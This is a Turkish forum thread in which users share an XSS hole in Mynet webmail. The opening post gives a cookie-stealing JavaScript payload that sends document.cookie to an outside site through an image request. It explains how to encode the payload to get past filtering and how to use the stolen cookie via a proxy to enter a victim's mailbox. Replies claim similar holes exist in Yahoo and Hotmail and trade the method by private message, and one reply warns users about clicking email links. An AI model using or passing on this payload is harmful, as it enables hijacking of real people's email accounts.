Mynet Maillerde Xss Açığı...
-
mynet mailde html olarak
taglarının çalışmasına izin verior buda başına çok güzel sonuçlar doğuruyor. Bu sayede karşıdakinin cookie'sini çalar ve proxy ile onun mail kutusuna girebilirsiniz.
ancak charcode etmeniz gerekiyor encodesuzu yemiyor.
http://www.paulschou.com/tools/xlate/
buradan komutunuzu charcodelıyabilirsiniz.
Örnek kod:
i=new/**/Image();i.src='http://örneksite.com/fistandantilus/f.gif?'+document.cookie
bu kodu kendinize göre düzenleyin ve encode'layın.
-Alıntıdan yorumlanmıştır- -
güzel valla hoca :) işe yarar a.q. yahoo da var, hotmail de var gmail de bilmiyorum mynette de var iyi iyi :)
-
Hekkaten güzel,denerim kendi mailimde ama zaten mynetin heryeri xss yiyo. Hotmailde de bulmak lasım onsuz olmuyor :P
-
Hotmaildede varda onu paylaşmak açığın kapanmasına sebebiyet verir :)
-
pw diye birşey var ;)
-
hazır konu açılmışken bir uyarı yapayım :)
bakın bu xss açığı yayılıyor sakın yutmayın, maillerde gelen linklere tıklamak yerine o linki kopyalayıp adres çubuğuna yapıştırın ve ordan açın.. Sonra mailim hacklendi diye ağlamayın a.q. 2-3 kez yazdım bunla ilgili şeyler millet takmıyor, sonra da nasıl yaptılar diye çene çalıyorlar...Uyanık olun biraz -
edit ( ertan cok doğru söylüyor..! )
-
GolgeleR sana pm attım bi bakıcan mı
-
:Daynen
-
arkadşalar GolgeleR i sıkıştırmayın, söyledim ona vermeyecek kimseye... Bu yöntemin yayılması hem bu açığın kapanmasına hemde masum insaların canının yanmasına sebebiyet verecektir..
-
Fistandantilus sana da pm attım o zaan :)
Toplam Hit: 12877 Toplam Mesaj: 11